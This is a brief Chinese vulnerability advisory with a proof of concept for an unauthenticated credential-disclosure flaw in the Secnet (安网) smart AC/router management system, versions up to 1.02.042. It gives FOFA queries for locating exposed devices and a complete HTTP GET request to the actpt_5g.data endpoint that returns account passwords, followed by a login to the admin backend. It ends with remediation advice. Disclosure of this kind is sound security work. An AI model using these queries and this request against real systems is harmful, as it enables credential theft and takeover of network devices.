0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司（简称“安网通信”）的无线AP管理系统。

0x02 漏洞概述

Secnet-智能路由系统 actpt_5g.data 接口存在信息泄露漏洞，未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据，导致系统后台权限失控，处于极不安全状态。

0x03 影响范围

version <= 1.02.042

0x04 复现环境

FOFA：

title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x05 漏洞复现

PoC

GET /actpt_5g.data HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close

读取账号密码信息 

登录后台

0x06 修复建议

删除该接口页面或增加访问控制

升级至安全版本